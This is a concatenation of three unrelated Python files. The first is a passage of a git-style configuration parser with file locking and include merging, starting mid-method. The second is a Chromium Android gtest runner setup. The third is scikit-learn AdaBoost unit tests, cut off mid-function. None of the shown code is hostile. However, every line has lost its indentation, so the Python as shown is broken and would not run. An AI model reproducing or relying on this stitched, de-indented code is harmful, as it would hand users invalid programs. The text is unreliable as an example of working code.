kmm = '_mutating_methods_'
if kmm in clsdict:
mutating_methods = clsdict[kmm]
for base in bases:
methods = (t for t in inspect.getmembers(base, inspect.isroutine) if not t[0].startswith("_"))
for name, method in methods:
if name in clsdict:
continue
method_with_values = needs_values(method)
if name in mutating_methods:
method_with_values = set_dirty_and_flush_changes(method_with_values)
# END mutating methods handling
clsdict[name] = method_with_values
# END for each name/method pair
# END for each base
# END if mutating methods configuration is set
new_type = super(MetaParserBuilder, cls).__new__(cls, name, bases, clsdict)
return new_type
def needs_values(func):
"""Returns method assuring we read values (on demand) before we try to access them"""
@wraps(func)
def assure_data_present(self, *args, **kwargs):
self.read()
return func(self, *args, **kwargs)
# END wrapper method
return assure_data_present
def set_dirty_and_flush_changes(non_const_func):
"""Return method that checks whether given non constant function may be called.
If so, the instance will be set dirty.
Additionally, we flush the changes right to disk"""
def flush_changes(self, *args, **kwargs):
rval = non_const_func(self, *args, **kwargs)
self._dirty = True
self.write()
return rval
# END wrapper method
flush_changes.__name__ = non_const_func.__name__
return flush_changes
class SectionConstraint(object):
"""Constrains a ConfigParser to only option commands which are constrained to
always use the section we have been initialized with.
It supports all ConfigParser methods that operate on an option.
:note:
If used as a context manager, will release the wrapped ConfigParser."""
__slots__ = ("_config", "_section_name")
_valid_attrs_ = ("get_value", "set_value", "get", "set", "getint", "getfloat", "getboolean", "has_option",
"remove_section", "remove_option", "options")
def __init__(self, config, section):
self._config = config
self._section_name = section
def __del__(self):
# Yes, for some reason, we have to call it explicitly for it to work in PY3 !
# Apparently __del__ doesn't get call anymore if refcount becomes 0
# Ridiculous ... .
self._config.release()
def __getattr__(self, attr):
if attr in self._valid_attrs_:
return lambda *args, **kwargs: self._call_config(attr, *args, **kwargs)
return super(SectionConstraint, self).__getattribute__(attr)
def _call_config(self, method, *args, **kwargs):
"""Call the configuration at the given method which must take a section name
as first argument"""
return getattr(self._config, method)(self._section_name, *args, **kwargs)
@property
def config(self):
"""return: Configparser instance we constrain"""
return self._config
def release(self):
"""Equivalent to GitConfigParser.release(), which is called on our underlying parser instance"""
return self._config.release()
def __enter__(self):
self._config.__enter__()
return self
def __exit__(self, exception_type, exception_value, traceback):
self._config.__exit__(exception_type, exception_value, traceback)
class GitConfigParser(with_metaclass(MetaParserBuilder, cp.RawConfigParser, object)):
"""Implements specifics required to read git style configuration files.
This variation behaves much like the git.config command such that the configuration
will be read on demand based on the filepath given during initialization.
The changes will automatically be written once the instance goes out of scope, but
can be triggered manually as well.
The configuration file will be locked if you intend to change values preventing other
instances to write concurrently.
:note:
The config is case-sensitive even when queried, hence section and option names
must match perfectly.
If used as a context manager, will release the locked file."""
#{ Configuration
# The lock type determines the type of lock to use in new configuration readers.
# They must be compatible to the LockFile interface.
# A suitable alternative would be the BlockingLockFile
t_lock = LockFile
re_comment = re.compile(r'^\s*[#;]')
#} END configuration
optvalueonly_source = r'\s*(?P<option>[^:=\s][^:=]*)'
OPTVALUEONLY = re.compile(optvalueonly_source)
OPTCRE = re.compile(optvalueonly_source + r'\s*(?P<vi>[:=])\s*' + r'(?P<value>.*)$')
del optvalueonly_source
# list of RawConfigParser methods able to change the instance
_mutating_methods_ = ("add_section", "remove_section", "remove_option", "set")
def __init__(self, file_or_files, read_only=True, merge_includes=True):
"""Initialize a configuration reader to read the given file_or_files and to
possibly allow changes to it by setting read_only False
:param file_or_files:
A single file path or file objects or multiple of these
:param read_only:
If True, the ConfigParser may only read the data , but not change it.
If False, only a single file path or file object may be given. We will write back the changes
when they happen, or when the ConfigParser is released. This will not happen if other
configuration files have been included
:param merge_includes: if True, we will read files mentioned in [include] sections and merge their
contents into ours. This makes it impossible to write back an individual configuration file.
Thus, if you want to modify a single configuration file, turn this off to leave the original
dataset unaltered when reading it."""
cp.RawConfigParser.__init__(self, dict_type=OrderedDict)
# Used in python 3, needs to stay in sync with sections for underlying implementation to work
if not hasattr(self, '_proxies'):
self._proxies = self._dict()
self._file_or_files = file_or_files
self._read_only = read_only
self._dirty = False
self._is_initialized = False
self._merge_includes = merge_includes
self._lock = None
self._acquire_lock()
def _acquire_lock(self):
if not self._read_only:
if not self._lock:
if isinstance(self._file_or_files, (tuple, list)):
raise ValueError(
"Write-ConfigParsers can operate on a single file only, multiple files have been passed")
# END single file check
file_or_files = self._file_or_files
if not isinstance(self._file_or_files, string_types):
file_or_files = self._file_or_files.name
# END get filename from handle/stream
# initialize lock base - we want to write
self._lock = self.t_lock(file_or_files)
# END lock check
self._lock._obtain_lock()
# END read-only check
def __del__(self):
"""Write pending changes if required and release locks"""
# NOTE: only consistent in PY2
self.release()
def __enter__(self):
self._acquire_lock()
return self
def __exit__(self, exception_type, exception_value, traceback):
self.release()
def release(self):
"""Flush changes and release the configuration write lock. This instance must not be used anymore afterwards.
In Python 3, it's required to explicitly release locks and flush changes, as __del__ is not called
deterministically anymore."""
# checking for the lock here makes sure we do not raise during write()
# in case an invalid parser was created who could not get a lock
if self.read_only or (self._lock and not self._lock._has_lock()):
return
try:
try:
self.write()
except IOError:
log.error("Exception during destruction of GitConfigParser", exc_info=True)
except ReferenceError:
# This happens in PY3 ... and usually means that some state cannot be written
# as the sections dict cannot be iterated
# Usually when shutting down the interpreter, don'y know how to fix this
pass
finally:
self._lock._release_lock()
def optionxform(self, optionstr):
"""Do not transform options in any way when writing"""
return optionstr
def _read(self, fp, fpname):
"""A direct copy of the py2.4 version of the super class's _read method
to assure it uses ordered dicts. Had to change one line to make it work.
Future versions have this fixed, but in fact its quite embarrassing for the
guys not to have done it right in the first place !
Removed big comments to make it more compact.
Made sure it ignores initial whitespace as git uses tabs"""
cursect = None # None, or a dictionary
optname = None
lineno = 0
is_multi_line = False
e = None # None, or an exception
def string_decode(v):
if v[-1] == '\\':
v = v[:-1]
# end cut trailing escapes to prevent decode error
if PY3:
return v.encode(defenc).decode('unicode_escape')
else:
return v.decode('string_escape')
# end
# end
while True:
# we assume to read binary !
line = fp.readline().decode(defenc)
if not line:
break
lineno = lineno + 1
# comment or blank line?
if line.strip() == '' or self.re_comment.match(line):
continue
if line.split(None, 1)[0].lower() == 'rem' and line[0] in "rR":
# no leading whitespace
continue
# is it a section header?
mo = self.SECTCRE.match(line.strip())
if not is_multi_line and mo:
sectname = mo.group('header').strip()
if sectname in self._sections:
cursect = self._sections[sectname]
elif sectname == cp.DEFAULTSECT:
cursect = self._defaults
else:
cursect = self._dict((('__name__', sectname),))
self._sections[sectname] = cursect
self._proxies[sectname] = None
# So sections can't start with a continuation line
optname = None
# no section header in the file?
elif cursect is None:
raise cp.MissingSectionHeaderError(fpname, lineno, line)
# an option line?
elif not is_multi_line:
mo = self.OPTCRE.match(line)
if mo:
# We might just have handled the last line, which could contain a quotation we want to remove
optname, vi, optval = mo.group('option', 'vi', 'value')
if vi in ('=', ':') and ';' in optval and not optval.strip().startswith('"'):
pos = optval.find(';')
if pos != -1 and optval[pos - 1].isspace():
optval = optval[:pos]
optval = optval.strip()
if optval == '""':
optval = ''
# end handle empty string
optname = self.optionxform(optname.rstrip())
if len(optval) > 1 and optval[0] == '"' and optval[-1] != '"':
is_multi_line = True
optval = string_decode(optval[1:])
# end handle multi-line
cursect[optname] = optval
else:
# check if it's an option with no value - it's just ignored by git
if not self.OPTVALUEONLY.match(line):
if not e:
e = cp.ParsingError(fpname)
e.append(lineno, repr(line))
continue
else:
line = line.rstrip()
if line.endswith('"'):
is_multi_line = False
line = line[:-1]
# end handle quotations
cursect[optname] += string_decode(line)
# END parse section or option
# END while reading
# if any parsing errors occurred, raise an exception
if e:
raise e
def _has_includes(self):
return self._merge_includes and self.has_section('include')
def read(self):
"""Reads the data stored in the files we have been initialized with. It will
ignore files that cannot be read, possibly leaving an empty configuration
:return: Nothing
:raise IOError: if a file cannot be handled"""
if self._is_initialized:
return
self._is_initialized = True
if not isinstance(self._file_or_files, (tuple, list)):
files_to_read = [self._file_or_files]
else:
files_to_read = list(self._file_or_files)
# end assure we have a copy of the paths to handle
seen = set(files_to_read)
num_read_include_files = 0
while files_to_read:
file_path = files_to_read.pop(0)
fp = file_path
file_ok = False
if hasattr(fp, "seek"):
self._read(fp, fp.name)
else:
# assume a path if it is not a file-object
try:
with open(file_path, 'rb') as fp:
file_ok = True
self._read(fp, fp.name)
except IOError:
continue
# Read includes and append those that we didn't handle yet
# We expect all paths to be normalized and absolute (and will assure that is the case)
if self._has_includes():
for _, include_path in self.items('include'):
if include_path.startswith('~'):
include_path = osp.expanduser(include_path)
if not osp.isabs(include_path):
if not file_ok:
continue
# end ignore relative paths if we don't know the configuration file path
assert osp.isabs(file_path), "Need absolute paths to be sure our cycle checks will work"
include_path = osp.join(osp.dirname(file_path), include_path)
# end make include path absolute
include_path = osp.normpath(include_path)
if include_path in seen or not os.access(include_path, os.R_OK):
continue
seen.add(include_path)
files_to_read.append(include_path)
num_read_include_files += 1
# each include path in configuration file
# end handle includes
# END for each file object to read
# If there was no file included, we can safely write back (potentially) the configuration file
# without altering it's meaning
if num_read_include_files == 0:
self._merge_includes = False
# end
def _write(self, fp):
"""Write an .ini-format representation of the configuration state in
git compatible format"""
def write_section(name, section_dict):
fp.write(("[%s]\n" % name).encode(defenc))
for (key, value) in section_dict.items():
if key != "__name__":
fp.write(("\t%s = %s\n" % (key, self._value_to_string(value).replace('\n', '\n\t'))).encode(defenc))
# END if key is not __name__
# END section writing
if self._defaults:
write_section(cp.DEFAULTSECT, self._defaults)
for name, value in self._sections.items():
write_section(name, value)
def items(self, section_name):
""":return: list((option, value), ...) pairs of all items in the given section"""
return [(k, v) for k, v in super(GitConfigParser, self).items(section_name) if k != '__name__']
@needs_values
def write(self):
"""Write changes to our file, if there are changes at all
:raise IOError: if this is a read-only writer instance or if we could not obtain
a file lock"""
self._assure_writable("write")
if not self._dirty:
return
if isinstance(self._file_or_files, (list, tuple)):
raise AssertionError("Cannot write back if there is not exactly a single file to write to, have %i files"
% len(self._file_or_files))
# end assert multiple files
if self._has_includes():
log.debug("Skipping write-back of configuration file as include files were merged in." +
"Set merge_includes=False to prevent this.")
return
# end
fp = self._file_or_files
# we have a physical file on disk, so get a lock
is_file_lock = isinstance(fp, string_types + (FileType, ))
if is_file_lock:
self._lock._obtain_lock()
if not hasattr(fp, "seek"):
with open(self._file_or_files, "wb") as fp:
self._write(fp)
else:
fp.seek(0)
# make sure we do not overwrite into an existing file
if hasattr(fp, 'truncate'):
fp.truncate()
self._write(fp)
def _assure_writable(self, method_name):
if self.read_only:
raise IOError("Cannot execute non-constant method %s.%s" % (self, method_name))
def add_section(self, section):
"""Assures added options will stay in order"""
return super(GitConfigParser, self).add_section(section)
@property
def read_only(self):
""":return: True if this instance may change the configuration file"""
return self._read_only
def get_value(self, section, option, default=None):
"""
:param default:
If not None, the given default value will be returned in case
the option did not exist
:return: a properly typed value, either int, float or string
:raise TypeError: in case the value could not be understood
Otherwise the exceptions known to the ConfigParser will be raised."""
try:
valuestr = self.get(section, option)
except Exception:
if default is not None:
return default
raise
types = (int, float)
for numtype in types:
try:
val = numtype(valuestr)
# truncated value ?
if val != float(valuestr):
continue
return val
except (ValueError, TypeError):
continue
# END for each numeric type
# try boolean values as git uses them
vl = valuestr.lower()
if vl == 'false':
return False
if vl == 'true':
return True
if not isinstance(valuestr, string_types):
raise TypeError("Invalid value type: only int, long, float and str are allowed", valuestr)
return valuestr
def _value_to_string(self, value):
if isinstance(value, (int, float, bool)):
return str(value)
return force_text(value)
@needs_values
@set_dirty_and_flush_changes
def set_value(self, section, option, value):
"""Sets the given option in section to the given value.
It will create the section if required, and will not throw as opposed to the default
ConfigParser 'set' method.
:param section: Name of the section in which the option resides or should reside
:param option: Name of the options whose value to set
:param value: Value to set the option to. It must be a string or convertible
to a string
:return: this instance"""
if not self.has_section(section):
self.add_section(section)
self.set(section, option, self._value_to_string(value))
return self
def rename_section(self, section, new_name):
"""rename the given section to new_name
:raise ValueError: if section doesn't exit
:raise ValueError: if a section with new_name does already exist
:return: this instance
"""
if not self.has_section(section):
raise ValueError("Source section '%s' doesn't exist" % section)
if self.has_section(new_name):
raise ValueError("Destination section '%s' already exists" % new_name)
super(GitConfigParser, self).add_section(new_name)
for k, v in self.items(section):
self.set(new_name, k, self._value_to_string(v))
# end for each value to copy
# This call writes back the changes, which is why we don't have the respective decorator
self.remove_section(section)
return self
|
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates test runner factory and tests for GTests."""
import fnmatch
import glob
import logging
import os
import shutil
import sys
from pylib import android_commands
from pylib import cmd_helper
from pylib import constants
from pylib import ports
import test_package_apk
import test_package_exe
import test_runner
sys.path.insert(0,
os.path.join(constants.DIR_SOURCE_ROOT, 'build', 'util', 'lib',
'common'))
import unittest_util
_ISOLATE_FILE_PATHS = {
'base_unittests': 'base/base_unittests.isolate',
'breakpad_unittests': 'breakpad/breakpad_unittests.isolate',
'cc_perftests': 'cc/cc_perftests.isolate',
'components_unittests': 'components/components_unittests.isolate',
'content_browsertests': 'content/content_browsertests.isolate',
'content_unittests': 'content/content_unittests.isolate',
'media_unittests': 'media/media_unittests.isolate',
'net_unittests': 'net/net_unittests.isolate',
'ui_unittests': 'ui/ui_unittests.isolate',
'unit_tests': 'chrome/unit_tests.isolate',
'webkit_unit_tests':
'third_party/WebKit/Source/web/WebKitUnitTests.isolate',
}
# Paths relative to third_party/webrtc/ (kept separate for readability).
_WEBRTC_ISOLATE_FILE_PATHS = {
'audio_decoder_unittests':
'modules/audio_coding/neteq4/audio_decoder_unittests.isolate',
'common_audio_unittests': 'common_audio/common_audio_unittests.isolate',
'common_video_unittests': 'common_video/common_video_unittests.isolate',
'metrics_unittests': 'test/metrics_unittests.isolate',
'modules_tests': 'modules/modules_tests.isolate',
'modules_unittests': 'modules/modules_unittests.isolate',
'neteq_unittests': 'modules/audio_coding/neteq/neteq_unittests.isolate',
'system_wrappers_unittests':
'system_wrappers/source/system_wrappers_unittests.isolate',
'test_support_unittests': 'test/test_support_unittests.isolate',
'tools_unittests': 'tools/tools_unittests.isolate',
'video_engine_core_unittests':
'video_engine/video_engine_core_unittests.isolate',
'voice_engine_unittests': 'voice_engine/voice_engine_unittests.isolate',
}
# Append the WebRTC tests with the full path from Chromium's src/ root.
for test,isolate_path in _WEBRTC_ISOLATE_FILE_PATHS.items():
_ISOLATE_FILE_PATHS[test] = 'third_party/webrtc/%s' % isolate_path
# Used for filtering large data deps at a finer grain than what's allowed in
# isolate files since pushing deps to devices is expensive.
# Wildcards are allowed.
_DEPS_EXCLUSION_LIST = [
'chrome/test/data/extensions/api_test',
'chrome/test/data/extensions/secure_shell',
'chrome/test/data/firefox*',
'chrome/test/data/gpu',
'chrome/test/data/image_decoding',
'chrome/test/data/import',
'chrome/test/data/page_cycler',
'chrome/test/data/perf',
'chrome/test/data/pyauto_private',
'chrome/test/data/safari_import',
'chrome/test/data/scroll',
'chrome/test/data/third_party',
'third_party/hunspell_dictionaries/*.dic',
# crbug.com/258690
'webkit/data/bmp_decoder',
'webkit/data/ico_decoder',
]
_ISOLATE_SCRIPT = os.path.join(
constants.DIR_SOURCE_ROOT, 'tools', 'swarm_client', 'isolate.py')
def _GenerateDepsDirUsingIsolate(suite_name):
"""Generate the dependency dir for the test suite using isolate.
Args:
suite_name: Name of the test suite (e.g. base_unittests).
"""
if os.path.isdir(constants.ISOLATE_DEPS_DIR):
shutil.rmtree(constants.ISOLATE_DEPS_DIR)
isolate_rel_path = _ISOLATE_FILE_PATHS.get(suite_name)
if not isolate_rel_path:
logging.info('Did not find an isolate file for the test suite.')
return
isolate_abs_path = os.path.join(constants.DIR_SOURCE_ROOT, isolate_rel_path)
isolated_abs_path = os.path.join(
constants.GetOutDirectory(), '%s.isolated' % suite_name)
assert os.path.exists(isolate_abs_path)
isolate_cmd = [
'python', _ISOLATE_SCRIPT,
'remap',
'--isolate', isolate_abs_path,
'--isolated', isolated_abs_path,
'-V', 'PRODUCT_DIR=%s' % constants.GetOutDirectory(),
'-V', 'OS=android',
'--outdir', constants.ISOLATE_DEPS_DIR,
]
assert not cmd_helper.RunCmd(isolate_cmd)
# We're relying on the fact that timestamps are preserved
# by the remap command (hardlinked). Otherwise, all the data
# will be pushed to the device once we move to using time diff
# instead of md5sum. Perform a sanity check here.
for root, _, filenames in os.walk(constants.ISOLATE_DEPS_DIR):
if filenames:
linked_file = os.path.join(root, filenames[0])
orig_file = os.path.join(
constants.DIR_SOURCE_ROOT,
os.path.relpath(linked_file, constants.ISOLATE_DEPS_DIR))
if os.stat(linked_file).st_ino == os.stat(orig_file).st_ino:
break
else:
raise Exception('isolate remap command did not use hardlinks.')
# Delete excluded files as defined by _DEPS_EXCLUSION_LIST.
old_cwd = os.getcwd()
try:
os.chdir(constants.ISOLATE_DEPS_DIR)
excluded_paths = [x for y in _DEPS_EXCLUSION_LIST for x in glob.glob(y)]
if excluded_paths:
logging.info('Excluding the following from dependency list: %s',
excluded_paths)
for p in excluded_paths:
if os.path.isdir(p):
shutil.rmtree(p)
else:
os.remove(p)
finally:
os.chdir(old_cwd)
# On Android, all pak files need to be in the top-level 'paks' directory.
paks_dir = os.path.join(constants.ISOLATE_DEPS_DIR, 'paks')
os.mkdir(paks_dir)
for root, _, filenames in os.walk(os.path.join(constants.ISOLATE_DEPS_DIR,
'out')):
for filename in fnmatch.filter(filenames, '*.pak'):
shutil.move(os.path.join(root, filename), paks_dir)
# Move everything in PRODUCT_DIR to top level.
deps_product_dir = os.path.join(constants.ISOLATE_DEPS_DIR, 'out',
constants.GetBuildType())
if os.path.isdir(deps_product_dir):
for p in os.listdir(deps_product_dir):
shutil.move(os.path.join(deps_product_dir, p), constants.ISOLATE_DEPS_DIR)
os.rmdir(deps_product_dir)
os.rmdir(os.path.join(constants.ISOLATE_DEPS_DIR, 'out'))
def _GetDisabledTestsFilterFromFile(suite_name):
"""Returns a gtest filter based on the *_disabled file.
Args:
suite_name: Name of the test suite (e.g. base_unittests).
Returns:
A gtest filter which excludes disabled tests.
Example: '*-StackTrace.*:StringPrintfTest.StringPrintfMisc'
"""
filter_file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)),
'filter', '%s_disabled' % suite_name)
if not filter_file_path or not os.path.exists(filter_file_path):
logging.info('No filter file found at %s', filter_file_path)
return '*'
filters = [x for x in [x.strip() for x in file(filter_file_path).readlines()]
if x and x[0] != '#']
disabled_filter = '*-%s' % ':'.join(filters)
logging.info('Applying filter "%s" obtained from %s',
disabled_filter, filter_file_path)
return disabled_filter
def _GetTestsFromDevice(runner_factory, devices):
"""Get a list of tests from a device.
Args:
runner_factory: Callable that takes device and shard_index and returns
a TestRunner.
devices: A list of device ids.
Returns:
All the tests in the test suite.
"""
for device in devices:
try:
logging.info('Obtaining tests from %s', device)
return runner_factory(device, 0).GetAllTests()
except (android_commands.errors.WaitForResponseTimedOutError,
android_commands.errors.DeviceUnresponsiveError), e:
logging.warning('Failed obtaining tests from %s with exception: %s',
device, e)
raise Exception('No device available to get the list of tests.')
def _FilterTestsUsingPrefixes(all_tests, pre=False, manual=False):
"""Removes tests with disabled prefixes.
Args:
all_tests: List of tests to filter.
pre: If True, include tests with PRE_ prefix.
manual: If True, include tests with MANUAL_ prefix.
Returns:
List of tests remaining.
"""
filtered_tests = []
filter_prefixes = ['DISABLED_', 'FLAKY_', 'FAILS_']
if not pre:
filter_prefixes.append('PRE_')
if not manual:
filter_prefixes.append('MANUAL_')
for t in all_tests:
test_case, test = t.split('.', 1)
if not any([test_case.startswith(prefix) or test.startswith(prefix) for
prefix in filter_prefixes]):
filtered_tests.append(t)
return filtered_tests
def _FilterDisabledTests(tests, suite_name, has_gtest_filter):
"""Removes disabled tests from |tests|.
Applies the following filters in order:
1. Remove tests with disabled prefixes.
2. Remove tests specified in the *_disabled files in the 'filter' dir
Args:
tests: List of tests.
suite_name: Name of the test suite (e.g. base_unittests).
has_gtest_filter: Whether a gtest_filter is provided.
Returns:
List of tests remaining.
"""
tests = _FilterTestsUsingPrefixes(
tests, has_gtest_filter, has_gtest_filter)
tests = unittest_util.FilterTestNames(
tests, _GetDisabledTestsFilterFromFile(suite_name))
return tests
def Setup(test_options, devices):
"""Create the test runner factory and tests.
Args:
test_options: A GTestOptions object.
devices: A list of attached devices.
Returns:
A tuple of (TestRunnerFactory, tests).
"""
if not ports.ResetTestServerPortAllocation():
raise Exception('Failed to reset test server port.')
test_package = test_package_apk.TestPackageApk(test_options.suite_name)
if not os.path.exists(test_package.suite_path):
test_package = test_package_exe.TestPackageExecutable(
test_options.suite_name)
if not os.path.exists(test_package.suite_path):
raise Exception(
'Did not find %s target. Ensure it has been built.'
% test_options.suite_name)
logging.warning('Found target %s', test_package.suite_path)
_GenerateDepsDirUsingIsolate(test_options.suite_name)
# Constructs a new TestRunner with the current options.
def TestRunnerFactory(device, shard_index):
return test_runner.TestRunner(
test_options,
device,
test_package)
tests = _GetTestsFromDevice(TestRunnerFactory, devices)
if test_options.run_disabled:
test_options = test_options._replace(
test_arguments=('%s --gtest_also_run_disabled_tests' %
test_options.test_arguments))
else:
tests = _FilterDisabledTests(tests, test_options.suite_name,
bool(test_options.gtest_filter))
if test_options.gtest_filter:
tests = unittest_util.FilterTestNames(tests, test_options.gtest_filter)
# Coalesce unit tests into a single test per device
if test_options.suite_name != 'content_browsertests':
num_devices = len(devices)
tests = [':'.join(tests[i::num_devices]) for i in xrange(num_devices)]
tests = [t for t in tests if t]
return (TestRunnerFactory, tests)
|
|
"""Testing for the boost module (sklearn.ensemble.boost)."""
import numpy as np
from sklearn.utils.testing import assert_array_equal, assert_array_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal, assert_true
from sklearn.utils.testing import assert_raises, assert_raises_regexp
from sklearn.cross_validation import train_test_split
from sklearn.grid_search import GridSearchCV
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import AdaBoostRegressor
from sklearn.ensemble import weight_boosting
from scipy.sparse import csc_matrix
from scipy.sparse import csr_matrix
from scipy.sparse import coo_matrix
from scipy.sparse import dok_matrix
from scipy.sparse import lil_matrix
from sklearn.svm import SVC, SVR
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.utils import shuffle
from sklearn import datasets
# Common random state
rng = np.random.RandomState(0)
# Toy sample
X = [[-2, -1], [-1, -1], [-1, -2], [1, 1], [1, 2], [2, 1]]
y_class = ["foo", "foo", "foo", 1, 1, 1] # test string class labels
y_regr = [-1, -1, -1, 1, 1, 1]
T = [[-1, -1], [2, 2], [3, 2]]
y_t_class = ["foo", 1, 1]
y_t_regr = [-1, 1, 1]
# Load the iris dataset and randomly permute it
iris = datasets.load_iris()
perm = rng.permutation(iris.target.size)
iris.data, iris.target = shuffle(iris.data, iris.target, random_state=rng)
# Load the boston dataset and randomly permute it
boston = datasets.load_boston()
boston.data, boston.target = shuffle(boston.data, boston.target,
random_state=rng)
def test_samme_proba():
# Test the `_samme_proba` helper function.
# Define some example (bad) `predict_proba` output.
probs = np.array([[1, 1e-6, 0],
[0.19, 0.6, 0.2],
[-999, 0.51, 0.5],
[1e-6, 1, 1e-9]])
probs /= np.abs(probs.sum(axis=1))[:, np.newaxis]
# _samme_proba calls estimator.predict_proba.
# Make a mock object so I can control what gets returned.
class MockEstimator(object):
def predict_proba(self, X):
assert_array_equal(X.shape, probs.shape)
return probs
mock = MockEstimator()
samme_proba = weight_boosting._samme_proba(mock, 3, np.ones_like(probs))
assert_array_equal(samme_proba.shape, probs.shape)
assert_true(np.isfinite(samme_proba).all())
# Make sure that the correct elements come out as smallest --
# `_samme_proba` should preserve the ordering in each example.
assert_array_equal(np.argmin(samme_proba, axis=1), [2, 0, 0, 2])
assert_array_equal(np.argmax(samme_proba, axis=1), [0, 1, 1, 1])
def test_classification_toy():
# Check classification on a toy dataset.
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg, random_state=0)
clf.fit(X, y_class)
assert_array_equal(clf.predict(T), y_t_class)
assert_array_equal(np.unique(np.asarray(y_t_class)), clf.classes_)
assert_equal(clf.predict_proba(T).shape, (len(T), 2))
assert_equal(clf.decision_function(T).shape, (len(T),))
def test_regression_toy():
# Check classification on a toy dataset.
clf = AdaBoostRegressor(random_state=0)
clf.fit(X, y_regr)
assert_array_equal(clf.predict(T), y_t_regr)
def test_iris():
# Check consistency on dataset iris.
classes = np.unique(iris.target)
clf_samme = prob_samme = None
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg)
clf.fit(iris.data, iris.target)
assert_array_equal(classes, clf.classes_)
proba = clf.predict_proba(iris.data)
if alg == "SAMME":
clf_samme = clf
prob_samme = proba
assert_equal(proba.shape[1], len(classes))
assert_equal(clf.decision_function(iris.data).shape[1], len(classes))
score = clf.score(iris.data, iris.target)
assert score > 0.9, "Failed with algorithm %s and score = %f" % \
(alg, score)
# Somewhat hacky regression test: prior to
# ae7adc880d624615a34bafdb1d75ef67051b8200,
# predict_proba returned SAMME.R values for SAMME.
clf_samme.algorithm = "SAMME.R"
assert_array_less(0,
np.abs(clf_samme.predict_proba(iris.data) - prob_samme))
def test_boston():
# Check consistency on dataset boston house prices.
clf = AdaBoostRegressor(random_state=0)
clf.fit(boston.data, boston.target)
score = clf.score(boston.data, boston.target)
assert score > 0.85
def test_staged_predict():
# Check staged predictions.
rng = np.random.RandomState(0)
iris_weights = rng.randint(10, size=iris.target.shape)
boston_weights = rng.randint(10, size=boston.target.shape)
# AdaBoost classification
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg, n_estimators=10)
clf.fit(iris.data, iris.target, sample_weight=iris_weights)
predictions = clf.predict(iris.data)
staged_predictions = [p for p in clf.staged_predict(iris.data)]
proba = clf.predict_proba(iris.data)
staged_probas = [p for p in clf.staged_predict_proba(iris.data)]
score = clf.score(iris.data, iris.target, sample_weight=iris_weights)
staged_scores = [
s for s in clf.staged_score(
iris.data, iris.target, sample_weight=iris_weights)]
assert_equal(len(staged_predictions), 10)
assert_array_almost_equal(predictions, staged_predictions[-1])
assert_equal(len(staged_probas), 10)
assert_array_almost_equal(proba, staged_probas[-1])
assert_equal(len(staged_scores), 10)
assert_array_almost_equal(score, staged_scores[-1])
# AdaBoost regression
clf = AdaBoostRegressor(n_estimators=10, random_state=0)
clf.fit(boston.data, boston.target, sample_weight=boston_weights)
predictions = clf.predict(boston.data)
staged_predictions = [p for p in clf.staged_predict(boston.data)]
score = clf.score(boston.data, boston.target, sample_weight=boston_weights)
staged_scores = [
s for s in clf.staged_score(
boston.data, boston.target, sample_weight=boston_weights)]
assert_equal(len(staged_predictions), 10)
assert_array_almost_equal(predictions, staged_predictions[-1])
assert_equal(len(staged_scores), 10)
assert_array_almost_equal(score, staged_scores[-1])
def test_gridsearch():
# Check that base trees can be grid-searched.
# AdaBoost classification
boost = AdaBoostClassifier(base_estimator=DecisionTreeClassifier())
parameters = {'n_estimators': (1, 2),
'base_estimator__max_depth': (1, 2),
'algorithm': ('SAMME', 'SAMME.R')}
clf = GridSearchCV(boost, parameters)
clf.fit(iris.data, iris.target)
# AdaBoost regression
boost = AdaBoostRegressor(base_estimator=DecisionTreeRegressor(),
random_state=0)
parameters = {'n_estimators': (1, 2),
'base_estimator__max_depth': (1, 2)}
clf = GridSearchCV(boost, parameters)
clf.fit(boston.data, boston.target)
def test_pickle():
# Check pickability.
import pickle
# Adaboost classifier
for alg in ['SAMME', 'SAMME.R']:
obj = AdaBoostClassifier(algorithm=alg)
obj.fit(iris.data, iris.target)
score = obj.score(iris.data, iris.target)
s = pickle.dumps(obj)
obj2 = pickle.loads(s)
assert_equal(type(obj2), obj.__class__)
score2 = obj2.score(iris.data, iris.target)
assert_equal(score, score2)
# Adaboost regressor
obj = AdaBoostRegressor(random_state=0)
obj.fit(boston.data, boston.target)
score = obj.score(boston.data, boston.target)
s = pickle.dumps(obj)
obj2 = pickle.loads(s)
assert_equal(type(obj2), obj.__class__)
score2 = obj2.score(boston.data, boston.target)
assert_equal(score, score2)
def test_importances():
# Check variable importances.
X, y = datasets.make_classification(n_samples=2000,
n_features=10,
n_informative=3,
n_redundant=0,
n_repeated=0,
shuffle=False,
random_state=1)
for alg in ['SAMME', 'SAMME.R']:
clf = AdaBoostClassifier(algorithm=alg)
clf.fit(X, y)
importances = clf.feature_importances_
assert_equal(importances.shape[0], 10)
assert_equal((importances[:3, np.newaxis] >= importances[3:]).all(),
True)
def test_error():
# Test that it gives proper exception on deficient input.
assert_raises(ValueError,
AdaBoostClassifier(learning_rate=-1).fit,
X, y_class)
assert_raises(ValueError,
AdaBoostClassifier(algorithm="foo").fit,
X, y_class)
assert_raises(ValueError,
AdaBoostClassifier().fit,
X, y_class, sample_weight=np.asarray([-1]))
def test_base_estimator():
# Test different base estimators.
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
# XXX doesn't work with y_class because RF doesn't support classes_
# Shouldn't AdaBoost run a LabelBinarizer?
clf = AdaBoostClassifier(RandomForestClassifier())
clf.fit(X, y_regr)
clf = AdaBoostClassifier(SVC(), algorithm="SAMME")
clf.fit(X, y_class)
from sklearn.ensemble import RandomForestRegressor
from sklearn.svm import SVR
clf = AdaBoostRegressor(RandomForestRegressor(), random_state=0)
clf.fit(X, y_regr)
clf = AdaBoostRegressor(SVR(), random_state=0)
clf.fit(X, y_regr)
# Check that an empty discrete ensemble fails in fit, not predict.
X_fail = [[1, 1], [1, 1], [1, 1], [1, 1]]
y_fail = ["foo", "bar", 1, 2]
clf = AdaBoostClassifier(SVC(), algorithm="SAMME")
assert_raises_regexp(ValueError, "worse than random",
clf.fit, X_fail, y_fail)
def test_sample_weight_missing():
